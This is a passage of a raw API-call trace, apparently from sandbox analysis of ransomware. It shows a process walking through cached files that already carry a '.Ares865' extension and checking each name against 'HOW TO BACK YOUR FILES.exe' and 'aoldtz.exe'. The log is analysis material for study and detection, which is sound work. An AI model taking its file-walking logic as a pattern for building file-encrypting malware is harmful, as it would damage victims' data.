nFileSizeLow=0x5f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AA6SNZ6[1].png.Ares865", cAlternateFileName="AA6SNZ~1.ARE")) returned 1 [0110.904] lstrcmpiW (lpString1="AA6SNZ6[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.904] lstrcmpiW (lpString1="AA6SNZ6[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.904] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AA6SNZ6[1].png.Ares865" | out: lpString1="AA6SNZ6[1].png.Ares865") returned="AA6SNZ6[1].png.Ares865" [0110.904] lstrlenW (lpString="AA6SNZ6[1].png.Ares865") returned 22 [0110.904] lstrlenW (lpString="Ares865") returned 7 [0110.904] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.904] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x454eaa90, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x454eaa90, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a45dda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAbyinC[1].png.Ares865", cAlternateFileName="AABYIN~1.ARE")) returned 1 [0110.904] lstrcmpiW (lpString1="AAbyinC[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.904] lstrcmpiW (lpString1="AAbyinC[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.904] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAbyinC[1].png.Ares865" | out: lpString1="AAbyinC[1].png.Ares865") returned="AAbyinC[1].png.Ares865" [0110.904] lstrlenW (lpString="AAbyinC[1].png.Ares865") returned 22 [0110.904] lstrlenW (lpString="Ares865") returned 7 [0110.904] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.905] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45ab8030, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45ab8030, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a45dda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3710, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAicW5W[1].jpg.Ares865", cAlternateFileName="AAICW5~1.ARE")) returned 1 [0110.905] lstrcmpiW (lpString1="AAicW5W[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.905] lstrcmpiW (lpString1="AAicW5W[1].jpg.Ares865", lpString2="aoldtz.exe") returned -1 [0110.905] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAicW5W[1].jpg.Ares865" | out: lpString1="AAicW5W[1].jpg.Ares865") returned="AAicW5W[1].jpg.Ares865" [0110.905] lstrlenW (lpString="AAicW5W[1].jpg.Ares865") returned 22 [0110.905] lstrlenW (lpString="Ares865") returned 7 [0110.905] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.905] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x538925d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x538925d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a45dda0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1cb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAj0doQ[1].jpg.Ares865", cAlternateFileName="AAJ0DO~1.ARE")) returned 1 [0110.905] lstrcmpiW (lpString1="AAj0doQ[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.905] lstrcmpiW (lpString1="AAj0doQ[1].jpg.Ares865", lpString2="aoldtz.exe") returned -1 [0110.905] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAj0doQ[1].jpg.Ares865" | out: lpString1="AAj0doQ[1].jpg.Ares865") returned="AAj0doQ[1].jpg.Ares865" [0110.905] lstrlenW (lpString="AAj0doQ[1].jpg.Ares865") returned 22 [0110.905] lstrlenW (lpString="Ares865") returned 7 [0110.905] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.905] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5159c2b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5159c2b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a483f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x660, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAkqhIf[1].png.Ares865", cAlternateFileName="AAKQHI~1.ARE")) returned 1 [0110.905] lstrcmpiW (lpString1="AAkqhIf[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.905] lstrcmpiW (lpString1="AAkqhIf[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.905] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAkqhIf[1].png.Ares865" | out: lpString1="AAkqhIf[1].png.Ares865") returned="AAkqhIf[1].png.Ares865" [0110.905] lstrlenW (lpString="AAkqhIf[1].png.Ares865") returned 22 [0110.905] lstrlenW (lpString="Ares865") returned 7 [0110.905] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.905] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458308d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x458308d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a483f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2a90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAmo09p[1].jpg.Ares865", cAlternateFileName="AAMO09~1.ARE")) returned 1 [0110.906] lstrcmpiW (lpString1="AAmo09p[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.906] lstrcmpiW (lpString1="AAmo09p[1].jpg.Ares865", lpString2="aoldtz.exe") returned -1 [0110.906] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAmo09p[1].jpg.Ares865" | out: lpString1="AAmo09p[1].jpg.Ares865") returned="AAmo09p[1].jpg.Ares865" [0110.906] lstrlenW (lpString="AAmo09p[1].jpg.Ares865") returned 22 [0110.906] lstrlenW (lpString="Ares865") returned 7 [0110.906] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.906] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45bc29d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45bc29d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a483f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAmUyV2[1].png.Ares865", cAlternateFileName="AAMUYV~1.ARE")) returned 1 [0110.906] lstrcmpiW (lpString1="AAmUyV2[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.906] lstrcmpiW (lpString1="AAmUyV2[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.906] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAmUyV2[1].png.Ares865" | out: lpString1="AAmUyV2[1].png.Ares865") returned="AAmUyV2[1].png.Ares865" [0110.906] lstrlenW (lpString="AAmUyV2[1].png.Ares865") returned 22 [0110.906] lstrlenW (lpString="Ares865") returned 7 [0110.906] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.906] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45798350, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45798350, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a4aa060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAn7gKR[1].png.Ares865", cAlternateFileName="AAN7GK~1.ARE")) returned 1 [0110.906] lstrcmpiW (lpString1="AAn7gKR[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.906] lstrcmpiW (lpString1="AAn7gKR[1].png.Ares865", lpString2="aoldtz.exe") returned -1 [0110.906] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="AAn7gKR[1].png.Ares865" | out: lpString1="AAn7gKR[1].png.Ares865") returned="AAn7gKR[1].png.Ares865" [0110.906] lstrlenW (lpString="AAn7gKR[1].png.Ares865") returned 22 [0110.906] lstrlenW (lpString="Ares865") returned 7 [0110.906] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.907] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61be2420, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61be2420, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a4aa060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865", cAlternateFileName="ACTIVI~1.ARE")) returned 1 [0110.907] lstrcmpiW (lpString1="activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.907] lstrcmpiW (lpString1="activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865", lpString2="aoldtz.exe") returned -1 [0110.907] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865" | out: lpString1="activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865") returned="activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865" [0110.907] lstrlenW (lpString="activityi;src=2542116;type=clien612;cat=chrom0;ord=1;num=7814394060213[1].htm.Ares865") returned 85 [0110.907] lstrlenW (lpString="Ares865") returned 7 [0110.907] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.907] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf2a0770, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf2a0770, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a4aa060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2b70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="adfscript[1].Ares865", cAlternateFileName="ADFSCR~1.ARE")) returned 1 [0110.907] lstrcmpiW (lpString1="adfscript[1].Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.907] lstrcmpiW (lpString1="adfscript[1].Ares865", lpString2="aoldtz.exe") returned -1 [0110.907] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="adfscript[1].Ares865" | out: lpString1="adfscript[1].Ares865") returned="adfscript[1].Ares865" [0110.907] lstrlenW (lpString="adfscript[1].Ares865") returned 20 [0110.907] lstrlenW (lpString="Ares865") returned 7 [0110.907] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.907] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf54e030, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf54e030, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0x6a4aa060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1220, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="adfserve[1].Ares865", cAlternateFileName="ADFSER~1.ARE")) returned 1 [0110.907] lstrcmpiW (lpString1="adfserve[1].Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.907] lstrcmpiW (lpString1="adfserve[1].Ares865", lpString2="aoldtz.exe") returned -1 [0110.907] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="adfserve[1].Ares865" | out: lpString1="adfserve[1].Ares865") returned="adfserve[1].Ares865" [0110.907] lstrlenW (lpString="adfserve[1].Ares865") returned 19 [0110.907] lstrlenW (lpString="Ares865") returned 7 [0110.908] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.908] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x533a9870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x533a9870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a4d01c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x11b40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ast[2].js.Ares865", cAlternateFileName="AST_2_~1.ARE")) returned 1 [0110.908] lstrcmpiW (lpString1="ast[2].js.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.908] lstrcmpiW (lpString1="ast[2].js.Ares865", lpString2="aoldtz.exe") returned 1 [0110.908] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="ast[2].js.Ares865" | out: lpString1="ast[2].js.Ares865") returned="ast[2].js.Ares865" [0110.908] lstrlenW (lpString="ast[2].js.Ares865") returned 17 [0110.908] lstrlenW (lpString="Ares865") returned 7 [0110.908] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.908] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53d7b330, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53d7b330, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a4d01c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="async_usersync[1].Ares865", cAlternateFileName="ASYNC_~1.ARE")) returned 1 [0110.908] lstrcmpiW (lpString1="async_usersync[1].Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.908] lstrcmpiW (lpString1="async_usersync[1].Ares865", lpString2="aoldtz.exe") returned 1 [0110.908] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="async_usersync[1].Ares865" | out: lpString1="async_usersync[1].Ares865") returned="async_usersync[1].Ares865" [0110.908] lstrlenW (lpString="async_usersync[1].Ares865") returned 25 [0110.908] lstrlenW (lpString="Ares865") returned 7 [0110.908] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.908] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5108d3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5108d3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a4f6320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x89f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b2fd15[1].eot.Ares865", cAlternateFileName="B2FD15~1.ARE")) returned 1 [0110.908] lstrcmpiW (lpString1="b2fd15[1].eot.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.908] lstrcmpiW (lpString1="b2fd15[1].eot.Ares865", lpString2="aoldtz.exe") returned 1 [0110.908] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="b2fd15[1].eot.Ares865" | out: lpString1="b2fd15[1].eot.Ares865") returned="b2fd15[1].eot.Ares865" [0110.908] lstrlenW (lpString="b2fd15[1].eot.Ares865") returned 21 [0110.908] lstrlenW (lpString="Ares865") returned 7 [0110.908] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.909] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45915110, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45915110, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a4f6320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BB5zDwX[1].png.Ares865", cAlternateFileName="BB5ZDW~1.ARE")) returned 1 [0110.909] lstrcmpiW (lpString1="BB5zDwX[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.909] lstrcmpiW (lpString1="BB5zDwX[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.909] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BB5zDwX[1].png.Ares865" | out: lpString1="BB5zDwX[1].png.Ares865") returned="BB5zDwX[1].png.Ares865" [0110.909] lstrlenW (lpString="BB5zDwX[1].png.Ares865") returned 22 [0110.909] lstrlenW (lpString="Ares865") returned 7 [0110.909] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.909] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b042f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45b042f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a4f6320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x530, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBaK3Nm[1].png.Ares865", cAlternateFileName="BBAK3N~1.ARE")) returned 1 [0110.909] lstrcmpiW (lpString1="BBaK3Nm[1].png.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.909] lstrcmpiW (lpString1="BBaK3Nm[1].png.Ares865", lpString2="aoldtz.exe") returned 1 [0110.909] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBaK3Nm[1].png.Ares865" | out: lpString1="BBaK3Nm[1].png.Ares865") returned="BBaK3Nm[1].png.Ares865" [0110.909] lstrlenW (lpString="BBaK3Nm[1].png.Ares865") returned 22 [0110.909] lstrlenW (lpString="Ares865") returned 7 [0110.909] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.909] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53337450, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53337450, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a4f6320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2450, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBLcCz[1].jpg.Ares865", cAlternateFileName="BBBLCC~1.ARE")) returned 1 [0110.909] lstrcmpiW (lpString1="BBBLcCz[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.909] lstrcmpiW (lpString1="BBBLcCz[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.909] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBLcCz[1].jpg.Ares865" | out: lpString1="BBBLcCz[1].jpg.Ares865") returned="BBBLcCz[1].jpg.Ares865" [0110.909] lstrlenW (lpString="BBBLcCz[1].jpg.Ares865") returned 22 [0110.909] lstrlenW (lpString="Ares865") returned 7 [0110.909] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.909] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5348e0b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5348e0b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a51c480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBLdzQ[1].jpg.Ares865", cAlternateFileName="BBBLDZ~1.ARE")) returned 1 [0110.910] lstrcmpiW (lpString1="BBBLdzQ[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.910] lstrcmpiW (lpString1="BBBLdzQ[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.910] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBLdzQ[1].jpg.Ares865" | out: lpString1="BBBLdzQ[1].jpg.Ares865") returned="BBBLdzQ[1].jpg.Ares865" [0110.910] lstrlenW (lpString="BBBLdzQ[1].jpg.Ares865") returned 22 [0110.910] lstrlenW (lpString="Ares865") returned 7 [0110.910] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.910] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x532eb190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x532eb190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a51c480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x9f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBO1mQ[1].jpg.Ares865", cAlternateFileName="BBBO1M~1.ARE")) returned 1 [0110.910] lstrcmpiW (lpString1="BBBO1mQ[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.910] lstrcmpiW (lpString1="BBBO1mQ[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.910] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBO1mQ[1].jpg.Ares865" | out: lpString1="BBBO1mQ[1].jpg.Ares865") returned="BBBO1mQ[1].jpg.Ares865" [0110.910] lstrlenW (lpString="BBBO1mQ[1].jpg.Ares865") returned 22 [0110.910] lstrlenW (lpString="Ares865") returned 7 [0110.910] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.910] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x537add90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x537add90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a51c480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x39e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBO1qB[1].jpg.Ares865", cAlternateFileName="BBBO1Q~1.ARE")) returned 1 [0110.910] lstrcmpiW (lpString1="BBBO1qB[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.910] lstrcmpiW (lpString1="BBBO1qB[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.910] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBO1qB[1].jpg.Ares865" | out: lpString1="BBBO1qB[1].jpg.Ares865") returned="BBBO1qB[1].jpg.Ares865" [0110.910] lstrlenW (lpString="BBBO1qB[1].jpg.Ares865") returned 22 [0110.911] lstrlenW (lpString="Ares865") returned 7 [0110.911] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.911] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53194530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53194530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a5425e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xa60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBOIAt[1].jpg.Ares865", cAlternateFileName="BBBOIA~1.ARE")) returned 1 [0110.911] lstrcmpiW (lpString1="BBBOIAt[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.911] lstrcmpiW (lpString1="BBBOIAt[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.911] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBOIAt[1].jpg.Ares865" | out: lpString1="BBBOIAt[1].jpg.Ares865") returned="BBBOIAt[1].jpg.Ares865" [0110.911] lstrlenW (lpString="BBBOIAt[1].jpg.Ares865") returned 22 [0110.911] lstrlenW (lpString="Ares865") returned 7 [0110.911] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.911] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x539049f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x539049f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a5425e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x9e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBOmuh[1].jpg.Ares865", cAlternateFileName="BBBOMU~1.ARE")) returned 1 [0110.911] lstrcmpiW (lpString1="BBBOmuh[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.911] lstrcmpiW (lpString1="BBBOmuh[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.911] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBOmuh[1].jpg.Ares865" | out: lpString1="BBBOmuh[1].jpg.Ares865") returned="BBBOmuh[1].jpg.Ares865" [0110.911] lstrlenW (lpString="BBBOmuh[1].jpg.Ares865") returned 22 [0110.911] lstrlenW (lpString="Ares865") returned 7 [0110.911] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.911] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53467f50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53467f50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a5425e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, 